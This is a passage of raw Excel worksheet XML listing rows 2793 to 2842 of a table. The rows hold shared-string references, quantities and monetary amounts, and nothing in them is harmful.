      </c>
      <c r="F2793" s="238" t="s">
        <v>12555</v>
      </c>
      <c r="G2793" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2793" s="10">
        <v>2</v>
      </c>
      <c r="I2793" s="14">
        <v>3914.53</v>
      </c>
      <c r="J2793" s="15">
        <v>626.3264</v>
      </c>
      <c r="K2793" s="16"/>
    </row>
    <row r="2794" spans="2:11">
      <c r="B2794" s="9">
        <v>2828</v>
      </c>
      <c r="C2794" s="238" t="s">
        <v>12556</v>
      </c>
      <c r="D2794" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2794" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2794" s="238" t="s">
        <v>12557</v>
      </c>
      <c r="G2794" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2794" s="10">
        <v>3</v>
      </c>
      <c r="I2794" s="14">
        <v>5829.05</v>
      </c>
      <c r="J2794" s="15">
        <v>932.6496</v>
      </c>
      <c r="K2794" s="16"/>
    </row>
    <row r="2795" spans="2:11">
      <c r="B2795" s="9">
        <v>2829</v>
      </c>
      <c r="C2795" s="238" t="s">
        <v>12558</v>
      </c>
      <c r="D2795" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2795" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2795" s="238" t="s">
        <v>12559</v>
      </c>
      <c r="G2795" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2795" s="10">
        <v>9</v>
      </c>
      <c r="I2795" s="14">
        <v>15071.79</v>
      </c>
      <c r="J2795" s="15">
        <v>2411.4816</v>
      </c>
      <c r="K2795" s="16"/>
    </row>
    <row r="2796" spans="2:11">
      <c r="B2796" s="9">
        <v>2830</v>
      </c>
      <c r="C2796" s="238" t="s">
        <v>12560</v>
      </c>
      <c r="D2796" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2796" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2796" s="238" t="s">
        <v>12561</v>
      </c>
      <c r="G2796" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2796" s="10">
        <v>4</v>
      </c>
      <c r="I2796" s="14">
        <v>6717.94</v>
      </c>
      <c r="J2796" s="15">
        <v>1074.8736</v>
      </c>
      <c r="K2796" s="16"/>
    </row>
    <row r="2797" spans="2:11">
      <c r="B2797" s="9">
        <v>2831</v>
      </c>
      <c r="C2797" s="238" t="s">
        <v>12562</v>
      </c>
      <c r="D2797" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2797" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2797" s="238" t="s">
        <v>12563</v>
      </c>
      <c r="G2797" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2797" s="10">
        <v>4</v>
      </c>
      <c r="I2797" s="14">
        <v>5076.9</v>
      </c>
      <c r="J2797" s="15">
        <v>812.3072</v>
      </c>
      <c r="K2797" s="16"/>
    </row>
    <row r="2798" spans="2:11">
      <c r="B2798" s="9">
        <v>2832</v>
      </c>
      <c r="C2798" s="238" t="s">
        <v>12564</v>
      </c>
      <c r="D2798" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2798" s="238" t="s">
        <v>9521</v>
      </c>
      <c r="F2798" s="238" t="s">
        <v>12565</v>
      </c>
      <c r="G2798" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2798" s="10">
        <v>4</v>
      </c>
      <c r="I2798" s="14">
        <v>5863.24</v>
      </c>
      <c r="J2798" s="15">
        <v>938.1184</v>
      </c>
      <c r="K2798" s="16"/>
    </row>
    <row r="2799" spans="2:11">
      <c r="B2799" s="9">
        <v>2833</v>
      </c>
      <c r="C2799" s="238" t="s">
        <v>12566</v>
      </c>
      <c r="D2799" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E2799" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2799" s="238" t="s">
        <v>12567</v>
      </c>
      <c r="G2799" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2799" s="10">
        <v>3</v>
      </c>
      <c r="I2799" s="14">
        <v>2025.64</v>
      </c>
      <c r="J2799" s="15">
        <v>324.1008</v>
      </c>
      <c r="K2799" s="16"/>
    </row>
    <row r="2800" spans="2:11">
      <c r="B2800" s="9">
        <v>2834</v>
      </c>
      <c r="C2800" s="238" t="s">
        <v>12568</v>
      </c>
      <c r="D2800" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E2800" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2800" s="238" t="s">
        <v>12569</v>
      </c>
      <c r="G2800" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2800" s="10">
        <v>4</v>
      </c>
      <c r="I2800" s="14">
        <v>1162.39</v>
      </c>
      <c r="J2800" s="15">
        <v>185.984</v>
      </c>
      <c r="K2800" s="16"/>
    </row>
    <row r="2801" spans="2:11">
      <c r="B2801" s="9">
        <v>2835</v>
      </c>
      <c r="C2801" s="238" t="s">
        <v>12570</v>
      </c>
      <c r="D2801" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E2801" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2801" s="238" t="s">
        <v>12571</v>
      </c>
      <c r="G2801" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2801" s="10">
        <v>6</v>
      </c>
      <c r="I2801" s="14">
        <v>871.79</v>
      </c>
      <c r="J2801" s="15">
        <v>139.488</v>
      </c>
      <c r="K2801" s="16"/>
    </row>
    <row r="2802" spans="2:11">
      <c r="B2802" s="9">
        <v>2836</v>
      </c>
      <c r="C2802" s="238" t="s">
        <v>12572</v>
      </c>
      <c r="D2802" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E2802" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2802" s="238" t="s">
        <v>12573</v>
      </c>
      <c r="G2802" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2802" s="10">
        <v>39</v>
      </c>
      <c r="I2802" s="14">
        <v>11564.1</v>
      </c>
      <c r="J2802" s="15">
        <v>1850.2848</v>
      </c>
      <c r="K2802" s="16"/>
    </row>
    <row r="2803" spans="2:11">
      <c r="B2803" s="9">
        <v>2837</v>
      </c>
      <c r="C2803" s="238" t="s">
        <v>12574</v>
      </c>
      <c r="D2803" s="238" t="s">
        <v>9559</v>
      </c>
      <c r="E2803" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2803" s="238" t="s">
        <v>12575</v>
      </c>
      <c r="G2803" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2803" s="10">
        <v>44</v>
      </c>
      <c r="I2803" s="14">
        <v>11301.53</v>
      </c>
      <c r="J2803" s="15">
        <v>1808.224</v>
      </c>
      <c r="K2803" s="16"/>
    </row>
    <row r="2804" spans="2:11">
      <c r="B2804" s="9">
        <v>2838</v>
      </c>
      <c r="C2804" s="238" t="s">
        <v>12576</v>
      </c>
      <c r="D2804" s="238" t="s">
        <v>6588</v>
      </c>
      <c r="E2804" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F2804" s="238" t="s">
        <v>12577</v>
      </c>
      <c r="G2804" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2804" s="10">
        <v>1</v>
      </c>
      <c r="I2804" s="14">
        <v>5683.76</v>
      </c>
      <c r="J2804" s="15">
        <v>909.4016</v>
      </c>
      <c r="K2804" s="16"/>
    </row>
    <row r="2805" spans="2:11">
      <c r="B2805" s="9">
        <v>2839</v>
      </c>
      <c r="C2805" s="238" t="s">
        <v>12578</v>
      </c>
      <c r="D2805" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E2805" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2805" s="238" t="s">
        <v>12579</v>
      </c>
      <c r="G2805" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2805" s="10">
        <v>2</v>
      </c>
      <c r="I2805" s="14">
        <v>1004.28</v>
      </c>
      <c r="J2805" s="15">
        <v>401.712</v>
      </c>
      <c r="K2805" s="16"/>
    </row>
    <row r="2806" spans="2:11">
      <c r="B2806" s="9">
        <v>2840</v>
      </c>
      <c r="C2806" s="238" t="s">
        <v>12580</v>
      </c>
      <c r="D2806" s="238" t="s">
        <v>11855</v>
      </c>
      <c r="E2806" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2806" s="238" t="s">
        <v>12581</v>
      </c>
      <c r="G2806" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2806" s="10">
        <v>2</v>
      </c>
      <c r="I2806" s="14">
        <v>1290.6</v>
      </c>
      <c r="J2806" s="15">
        <v>206.496</v>
      </c>
      <c r="K2806" s="16"/>
    </row>
    <row r="2807" spans="2:11">
      <c r="B2807" s="9">
        <v>2841</v>
      </c>
      <c r="C2807" s="238" t="s">
        <v>12582</v>
      </c>
      <c r="D2807" s="238" t="s">
        <v>12583</v>
      </c>
      <c r="E2807" s="238" t="s">
        <v>11388</v>
      </c>
      <c r="F2807" s="238" t="s">
        <v>12584</v>
      </c>
      <c r="G2807" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2807" s="10">
        <v>6</v>
      </c>
      <c r="I2807" s="14">
        <v>538.47</v>
      </c>
      <c r="J2807" s="15">
        <v>86.16</v>
      </c>
      <c r="K2807" s="16"/>
    </row>
    <row r="2808" spans="2:11">
      <c r="B2808" s="9">
        <v>2842</v>
      </c>
      <c r="C2808" s="238" t="s">
        <v>12585</v>
      </c>
      <c r="D2808" s="238" t="s">
        <v>4911</v>
      </c>
      <c r="E2808" s="238" t="s">
        <v>12586</v>
      </c>
      <c r="F2808" s="238" t="s">
        <v>12587</v>
      </c>
      <c r="G2808" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2808" s="10">
        <v>2</v>
      </c>
      <c r="I2808" s="14">
        <v>461.54</v>
      </c>
      <c r="J2808" s="15">
        <v>73.8464</v>
      </c>
      <c r="K2808" s="16"/>
    </row>
    <row r="2809" spans="2:11">
      <c r="B2809" s="9">
        <v>2843</v>
      </c>
      <c r="C2809" s="238" t="s">
        <v>12588</v>
      </c>
      <c r="D2809" s="238" t="s">
        <v>12589</v>
      </c>
      <c r="E2809" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2809" s="238" t="s">
        <v>12590</v>
      </c>
      <c r="G2809" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2809" s="10">
        <v>1</v>
      </c>
      <c r="I2809" s="14">
        <v>769.23</v>
      </c>
      <c r="J2809" s="15">
        <v>123.0768</v>
      </c>
      <c r="K2809" s="16"/>
    </row>
    <row r="2810" spans="2:11">
      <c r="B2810" s="9">
        <v>2844</v>
      </c>
      <c r="C2810" s="238" t="s">
        <v>12591</v>
      </c>
      <c r="D2810" s="238" t="s">
        <v>12589</v>
      </c>
      <c r="E2810" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2810" s="238" t="s">
        <v>12592</v>
      </c>
      <c r="G2810" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2810" s="10">
        <v>1</v>
      </c>
      <c r="I2810" s="14">
        <v>196.58</v>
      </c>
      <c r="J2810" s="15">
        <v>31.4528</v>
      </c>
      <c r="K2810" s="16"/>
    </row>
    <row r="2811" spans="2:11">
      <c r="B2811" s="9">
        <v>2845</v>
      </c>
      <c r="C2811" s="238" t="s">
        <v>12593</v>
      </c>
      <c r="D2811" s="238" t="s">
        <v>5536</v>
      </c>
      <c r="E2811" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2811" s="238" t="s">
        <v>12594</v>
      </c>
      <c r="G2811" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2811" s="10">
        <v>1</v>
      </c>
      <c r="I2811" s="14">
        <v>29.91</v>
      </c>
      <c r="J2811" s="15">
        <v>4.7856</v>
      </c>
      <c r="K2811" s="16"/>
    </row>
    <row r="2812" spans="2:11">
      <c r="B2812" s="9">
        <v>2846</v>
      </c>
      <c r="C2812" s="238" t="s">
        <v>12595</v>
      </c>
      <c r="D2812" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E2812" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2812" s="238" t="s">
        <v>12596</v>
      </c>
      <c r="G2812" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2812" s="10">
        <v>1</v>
      </c>
      <c r="I2812" s="14">
        <v>119.66</v>
      </c>
      <c r="J2812" s="15">
        <v>19.1456</v>
      </c>
      <c r="K2812" s="16"/>
    </row>
    <row r="2813" spans="2:11">
      <c r="B2813" s="9">
        <v>2847</v>
      </c>
      <c r="C2813" s="238" t="s">
        <v>12597</v>
      </c>
      <c r="D2813" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E2813" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2813" s="238" t="s">
        <v>12598</v>
      </c>
      <c r="G2813" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2813" s="10">
        <v>7</v>
      </c>
      <c r="I2813" s="14">
        <v>1794.87</v>
      </c>
      <c r="J2813" s="15">
        <v>287.1792</v>
      </c>
      <c r="K2813" s="16"/>
    </row>
    <row r="2814" spans="2:11">
      <c r="B2814" s="9">
        <v>2848</v>
      </c>
      <c r="C2814" s="238" t="s">
        <v>12599</v>
      </c>
      <c r="D2814" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E2814" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2814" s="238" t="s">
        <v>12600</v>
      </c>
      <c r="G2814" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2814" s="10">
        <v>1</v>
      </c>
      <c r="I2814" s="14">
        <v>162.39</v>
      </c>
      <c r="J2814" s="15">
        <v>25.9824</v>
      </c>
      <c r="K2814" s="16"/>
    </row>
    <row r="2815" spans="2:11">
      <c r="B2815" s="9">
        <v>2849</v>
      </c>
      <c r="C2815" s="238" t="s">
        <v>12601</v>
      </c>
      <c r="D2815" s="238" t="s">
        <v>5900</v>
      </c>
      <c r="E2815" s="238" t="s">
        <v>12602</v>
      </c>
      <c r="F2815" s="238" t="s">
        <v>12603</v>
      </c>
      <c r="G2815" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2815" s="10">
        <v>5</v>
      </c>
      <c r="I2815" s="14">
        <v>547.01</v>
      </c>
      <c r="J2815" s="15">
        <v>87.52</v>
      </c>
      <c r="K2815" s="16"/>
    </row>
    <row r="2816" spans="2:11">
      <c r="B2816" s="9">
        <v>2850</v>
      </c>
      <c r="C2816" s="238" t="s">
        <v>12604</v>
      </c>
      <c r="D2816" s="238" t="s">
        <v>6795</v>
      </c>
      <c r="E2816" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2816" s="238" t="s">
        <v>12605</v>
      </c>
      <c r="G2816" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2816" s="10">
        <v>2</v>
      </c>
      <c r="I2816" s="14">
        <v>51.28</v>
      </c>
      <c r="J2816" s="15">
        <v>8.2048</v>
      </c>
      <c r="K2816" s="16"/>
    </row>
    <row r="2817" spans="2:11">
      <c r="B2817" s="9">
        <v>2851</v>
      </c>
      <c r="C2817" s="238" t="s">
        <v>12606</v>
      </c>
      <c r="D2817" s="238" t="s">
        <v>7938</v>
      </c>
      <c r="E2817" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2817" s="238" t="s">
        <v>12607</v>
      </c>
      <c r="G2817" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2817" s="10">
        <v>1</v>
      </c>
      <c r="I2817" s="14">
        <v>12735.04</v>
      </c>
      <c r="J2817" s="15">
        <v>2037.6064</v>
      </c>
      <c r="K2817" s="16"/>
    </row>
    <row r="2818" spans="2:11">
      <c r="B2818" s="9">
        <v>2852</v>
      </c>
      <c r="C2818" s="238" t="s">
        <v>12608</v>
      </c>
      <c r="D2818" s="238" t="s">
        <v>12609</v>
      </c>
      <c r="E2818" s="238" t="s">
        <v>12610</v>
      </c>
      <c r="F2818" s="238" t="s">
        <v>12607</v>
      </c>
      <c r="G2818" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2818" s="10">
        <v>1</v>
      </c>
      <c r="I2818" s="14">
        <v>3846.15</v>
      </c>
      <c r="J2818" s="15">
        <v>615.384</v>
      </c>
      <c r="K2818" s="16"/>
    </row>
    <row r="2819" spans="2:11">
      <c r="B2819" s="9">
        <v>2853</v>
      </c>
      <c r="C2819" s="238" t="s">
        <v>12611</v>
      </c>
      <c r="D2819" s="238" t="s">
        <v>7938</v>
      </c>
      <c r="E2819" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2819" s="238" t="s">
        <v>12612</v>
      </c>
      <c r="G2819" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2819" s="10">
        <v>2</v>
      </c>
      <c r="I2819" s="14">
        <v>26410.26</v>
      </c>
      <c r="J2819" s="15">
        <v>4225.6416</v>
      </c>
      <c r="K2819" s="16"/>
    </row>
    <row r="2820" spans="2:11">
      <c r="B2820" s="9">
        <v>2854</v>
      </c>
      <c r="C2820" s="238" t="s">
        <v>12613</v>
      </c>
      <c r="D2820" s="238" t="s">
        <v>12609</v>
      </c>
      <c r="E2820" s="238" t="s">
        <v>12610</v>
      </c>
      <c r="F2820" s="238" t="s">
        <v>12614</v>
      </c>
      <c r="G2820" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2820" s="10">
        <v>1</v>
      </c>
      <c r="I2820" s="14">
        <v>4273.5</v>
      </c>
      <c r="J2820" s="15">
        <v>683.76</v>
      </c>
      <c r="K2820" s="16"/>
    </row>
    <row r="2821" spans="2:11">
      <c r="B2821" s="9">
        <v>2855</v>
      </c>
      <c r="C2821" s="238" t="s">
        <v>12615</v>
      </c>
      <c r="D2821" s="238" t="s">
        <v>12616</v>
      </c>
      <c r="E2821" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F2821" s="238" t="s">
        <v>12617</v>
      </c>
      <c r="G2821" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2821" s="10">
        <v>1</v>
      </c>
      <c r="I2821" s="14">
        <v>6324.79</v>
      </c>
      <c r="J2821" s="15">
        <v>1011.9664</v>
      </c>
      <c r="K2821" s="16"/>
    </row>
    <row r="2822" spans="2:11">
      <c r="B2822" s="9">
        <v>2856</v>
      </c>
      <c r="C2822" s="238" t="s">
        <v>12618</v>
      </c>
      <c r="D2822" s="9"/>
      <c r="E2822" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F2822" s="238" t="s">
        <v>12619</v>
      </c>
      <c r="G2822" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2822" s="10">
        <v>2</v>
      </c>
      <c r="I2822" s="14">
        <v>1299.15</v>
      </c>
      <c r="J2822" s="15">
        <v>207.8656</v>
      </c>
      <c r="K2822" s="16"/>
    </row>
    <row r="2823" spans="2:11">
      <c r="B2823" s="9">
        <v>2857</v>
      </c>
      <c r="C2823" s="238" t="s">
        <v>12620</v>
      </c>
      <c r="D2823" s="238" t="s">
        <v>8150</v>
      </c>
      <c r="E2823" s="238" t="s">
        <v>12621</v>
      </c>
      <c r="F2823" s="238" t="s">
        <v>12622</v>
      </c>
      <c r="G2823" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2823" s="10">
        <v>1</v>
      </c>
      <c r="I2823" s="14">
        <v>23931.62</v>
      </c>
      <c r="J2823" s="15">
        <v>3829.0592</v>
      </c>
      <c r="K2823" s="16"/>
    </row>
    <row r="2824" spans="2:11">
      <c r="B2824" s="9">
        <v>2858</v>
      </c>
      <c r="C2824" s="238" t="s">
        <v>12623</v>
      </c>
      <c r="D2824" s="238" t="s">
        <v>8150</v>
      </c>
      <c r="E2824" s="238" t="s">
        <v>12624</v>
      </c>
      <c r="F2824" s="238" t="s">
        <v>12625</v>
      </c>
      <c r="G2824" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2824" s="10">
        <v>1</v>
      </c>
      <c r="I2824" s="14">
        <v>10256.41</v>
      </c>
      <c r="J2824" s="15">
        <v>1641.0256</v>
      </c>
      <c r="K2824" s="16"/>
    </row>
    <row r="2825" spans="2:11">
      <c r="B2825" s="9">
        <v>2859</v>
      </c>
      <c r="C2825" s="238" t="s">
        <v>12626</v>
      </c>
      <c r="D2825" s="9"/>
      <c r="E2825" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2825" s="238" t="s">
        <v>12627</v>
      </c>
      <c r="G2825" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2825" s="10">
        <v>1</v>
      </c>
      <c r="I2825" s="14">
        <v>897.43</v>
      </c>
      <c r="J2825" s="15">
        <v>143.5888</v>
      </c>
      <c r="K2825" s="16"/>
    </row>
    <row r="2826" spans="2:11">
      <c r="B2826" s="9">
        <v>2860</v>
      </c>
      <c r="C2826" s="238" t="s">
        <v>12628</v>
      </c>
      <c r="D2826" s="9"/>
      <c r="E2826" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2826" s="238" t="s">
        <v>12629</v>
      </c>
      <c r="G2826" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2826" s="10">
        <v>2</v>
      </c>
      <c r="I2826" s="14">
        <v>1145.3</v>
      </c>
      <c r="J2826" s="15">
        <v>183.248</v>
      </c>
      <c r="K2826" s="16"/>
    </row>
    <row r="2827" spans="2:11">
      <c r="B2827" s="9">
        <v>2861</v>
      </c>
      <c r="C2827" s="238" t="s">
        <v>12630</v>
      </c>
      <c r="D2827" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E2827" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="F2827" s="238" t="s">
        <v>12631</v>
      </c>
      <c r="G2827" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2827" s="10">
        <v>12</v>
      </c>
      <c r="I2827" s="14">
        <v>338.46</v>
      </c>
      <c r="J2827" s="15">
        <v>54.1632</v>
      </c>
      <c r="K2827" s="16"/>
    </row>
    <row r="2828" spans="2:11">
      <c r="B2828" s="9">
        <v>2862</v>
      </c>
      <c r="C2828" s="238" t="s">
        <v>12632</v>
      </c>
      <c r="D2828" s="9"/>
      <c r="E2828" s="238" t="s">
        <v>12633</v>
      </c>
      <c r="F2828" s="238" t="s">
        <v>12634</v>
      </c>
      <c r="G2828" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2828" s="10">
        <v>3</v>
      </c>
      <c r="I2828" s="14">
        <v>2333.34</v>
      </c>
      <c r="J2828" s="15">
        <v>373.3344</v>
      </c>
      <c r="K2828" s="16"/>
    </row>
    <row r="2829" spans="2:11">
      <c r="B2829" s="9">
        <v>2863</v>
      </c>
      <c r="C2829" s="238" t="s">
        <v>12635</v>
      </c>
      <c r="D2829" s="9"/>
      <c r="E2829" s="238" t="s">
        <v>12636</v>
      </c>
      <c r="F2829" s="238" t="s">
        <v>12637</v>
      </c>
      <c r="G2829" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2829" s="10">
        <v>3</v>
      </c>
      <c r="I2829" s="14">
        <v>1333.33</v>
      </c>
      <c r="J2829" s="15">
        <v>213.3312</v>
      </c>
      <c r="K2829" s="16"/>
    </row>
    <row r="2830" spans="2:11">
      <c r="B2830" s="9">
        <v>2864</v>
      </c>
      <c r="C2830" s="238" t="s">
        <v>12638</v>
      </c>
      <c r="D2830" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E2830" s="238" t="s">
        <v>6888</v>
      </c>
      <c r="F2830" s="9"/>
      <c r="G2830" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H2830" s="10">
        <v>95.18</v>
      </c>
      <c r="I2830" s="14">
        <v>69309.11</v>
      </c>
      <c r="J2830" s="15">
        <v>11089.459872</v>
      </c>
      <c r="K2830" s="16"/>
    </row>
    <row r="2831" spans="2:11">
      <c r="B2831" s="9">
        <v>2865</v>
      </c>
      <c r="C2831" s="238" t="s">
        <v>12639</v>
      </c>
      <c r="D2831" s="238" t="s">
        <v>12640</v>
      </c>
      <c r="E2831" s="238" t="s">
        <v>12641</v>
      </c>
      <c r="F2831" s="9"/>
      <c r="G2831" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2831" s="10">
        <v>45951</v>
      </c>
      <c r="I2831" s="14">
        <v>63878.73</v>
      </c>
      <c r="J2831" s="15">
        <v>10219.5024</v>
      </c>
      <c r="K2831" s="16"/>
    </row>
    <row r="2832" spans="2:11">
      <c r="B2832" s="9">
        <v>2866</v>
      </c>
      <c r="C2832" s="238" t="s">
        <v>12642</v>
      </c>
      <c r="D2832" s="238" t="s">
        <v>12643</v>
      </c>
      <c r="E2832" s="238" t="s">
        <v>12644</v>
      </c>
      <c r="F2832" s="9"/>
      <c r="G2832" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2832" s="10">
        <v>10</v>
      </c>
      <c r="I2832" s="14">
        <v>505.99</v>
      </c>
      <c r="J2832" s="15">
        <v>80.96</v>
      </c>
      <c r="K2832" s="16"/>
    </row>
    <row r="2833" spans="2:11">
      <c r="B2833" s="9">
        <v>2871</v>
      </c>
      <c r="C2833" s="9" t="s">
        <v>12645</v>
      </c>
      <c r="D2833" s="9"/>
      <c r="E2833" s="9" t="s">
        <v>12646</v>
      </c>
      <c r="F2833" s="9"/>
      <c r="G2833" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2833" s="9"/>
      <c r="I2833" s="17"/>
      <c r="J2833" s="15">
        <v>400</v>
      </c>
      <c r="K2833" s="16"/>
    </row>
    <row r="2834" spans="2:11">
      <c r="B2834" s="9">
        <v>2872</v>
      </c>
      <c r="C2834" s="9" t="s">
        <v>12647</v>
      </c>
      <c r="D2834" s="9"/>
      <c r="E2834" s="9" t="s">
        <v>5377</v>
      </c>
      <c r="F2834" s="9" t="s">
        <v>12648</v>
      </c>
      <c r="G2834" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2834" s="9"/>
      <c r="I2834" s="17"/>
      <c r="J2834" s="15">
        <v>28</v>
      </c>
      <c r="K2834" s="16"/>
    </row>
    <row r="2835" spans="2:11">
      <c r="B2835" s="9">
        <v>2873</v>
      </c>
      <c r="C2835" s="9" t="s">
        <v>12649</v>
      </c>
      <c r="D2835" s="9"/>
      <c r="E2835" s="9" t="s">
        <v>6897</v>
      </c>
      <c r="F2835" s="9" t="s">
        <v>12650</v>
      </c>
      <c r="G2835" s="16" t="s">
        <v>5852</v>
      </c>
      <c r="H2835" s="9"/>
      <c r="I2835" s="17"/>
      <c r="J2835" s="15">
        <v>2000</v>
      </c>
      <c r="K2835" s="16"/>
    </row>
    <row r="2836" spans="2:11">
      <c r="B2836" s="9">
        <v>2874</v>
      </c>
      <c r="C2836" s="9" t="s">
        <v>12651</v>
      </c>
      <c r="D2836" s="9"/>
      <c r="E2836" s="9" t="s">
        <v>12652</v>
      </c>
      <c r="F2836" s="9"/>
      <c r="G2836" s="16" t="s">
        <v>5495</v>
      </c>
      <c r="H2836" s="9"/>
      <c r="I2836" s="17"/>
      <c r="J2836" s="15">
        <v>40</v>
      </c>
      <c r="K2836" s="16"/>
    </row>
    <row r="2837" spans="2:11">
      <c r="B2837" s="9">
        <v>2875</v>
      </c>
      <c r="C2837" s="9" t="s">
        <v>12653</v>
      </c>
      <c r="D2837" s="9"/>
      <c r="E2837" s="9" t="s">
        <v>12654</v>
      </c>
      <c r="F2837" s="9" t="s">
        <v>12655</v>
      </c>
      <c r="G2837" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2837" s="9"/>
      <c r="I2837" s="17"/>
      <c r="J2837" s="15">
        <v>160</v>
      </c>
      <c r="K2837" s="16"/>
    </row>
    <row r="2838" spans="2:11">
      <c r="B2838" s="9">
        <v>2876</v>
      </c>
      <c r="C2838" s="9" t="s">
        <v>12656</v>
      </c>
      <c r="D2838" s="9"/>
      <c r="E2838" s="9" t="s">
        <v>12657</v>
      </c>
      <c r="F2838" s="9"/>
      <c r="G2838" s="16" t="s">
        <v>2125</v>
      </c>
      <c r="H2838" s="9"/>
      <c r="I2838" s="17"/>
      <c r="J2838" s="15">
        <v>1440</v>
      </c>
      <c r="K2838" s="16"/>
    </row>
    <row r="2839" spans="2:11">
      <c r="B2839" s="9">
        <v>2878</v>
      </c>
      <c r="C2839" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2839" s="9"/>
      <c r="E2839" s="9" t="s">
        <v>12659</v>
      </c>
      <c r="F2839" s="9"/>
      <c r="G2839" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2839" s="9"/>
      <c r="I2839" s="17"/>
      <c r="J2839" s="15">
        <v>240</v>
      </c>
      <c r="K2839" s="16"/>
    </row>
    <row r="2840" spans="2:11">
      <c r="B2840" s="9">
        <v>2879</v>
      </c>
      <c r="C2840" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2840" s="9"/>
      <c r="E2840" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="F2840" s="9" t="s">
        <v>12660</v>
      </c>
      <c r="G2840" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2840" s="9"/>
      <c r="I2840" s="17"/>
      <c r="J2840" s="15">
        <v>400</v>
      </c>
      <c r="K2840" s="16"/>
    </row>
    <row r="2841" spans="2:11">
      <c r="B2841" s="9">
        <v>2880</v>
      </c>
      <c r="C2841" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2841" s="9"/>
      <c r="E2841" s="9" t="s">
        <v>12661</v>
      </c>
      <c r="F2841" s="9" t="s">
        <v>2497</v>
      </c>
      <c r="G2841" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H2841" s="9"/>
      <c r="I2841" s="17"/>
      <c r="J2841" s="15">
        <v>400</v>
      </c>
      <c r="K2841" s="16"/>
    </row>
    <row r="2842" spans="2:11">
      <c r="B2842" s="9">
        <v>2881</v>
      </c>
